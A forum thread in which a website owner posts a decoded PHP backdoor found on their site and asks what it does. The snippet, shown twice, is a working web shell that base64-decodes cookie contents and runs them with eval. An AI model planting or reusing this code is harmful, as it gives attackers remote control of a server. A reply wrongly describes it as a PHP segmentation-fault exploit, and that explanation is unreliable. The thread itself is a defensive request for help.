Malicious Codes

darksystem · October 19, 2013, 2:09pm

Hi,

  I found an encoded file from our website and when I decoded it, I got this code

$c='count';$a=$_COOKIE;if(reset($a)=='th' && $c($a)>3){$k='3Password55';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\\w=\\s]/','/\\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '';}

  in more human readable manner code

$c='count';
$a=$_COOKIE;
if(reset($a)=='th' && $c($a)>3)
{
	$k='3Password55';echo '<'.$k.'>';
	eval(base64_decode(preg_replace(array('/[^\\w=\\s]/','/\\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
	echo '';
}

   Can somebody tell me what it is?
   I know the fact that it destroying our website but not sure the detailed information about it.

   I would appreciate if somebody could explain the code above.

   Experts, please share your knowledge for us to protect our website and what to do to prevent it.

Kind regards

Michael_Morris1 · October 20, 2013, 4:49am

You’ve been rooted. The code above exploits a segmentation fault in the PHP interpreter to create a backdoor into the system. A google search against the first line of the code reveals that much. More specifics on the exact exploit used will require a more exhaustive search.

The best procedure when dealing with a rootkit is to nuke it from orbit - that is get your data off the machine then reinstall the OS from scratch and make sure you are running the most current version of the branch of PHP you are using this time.

darksystem · October 30, 2013, 4:25pm

thanks michael.

i have now fully aware of the codes of what it does and how to prevent this hacking from happening.
after a careful research to prevent it, our website now is fully safe i guess. atleast for now.

anyway, thanks for your inputs and i really appreciate it.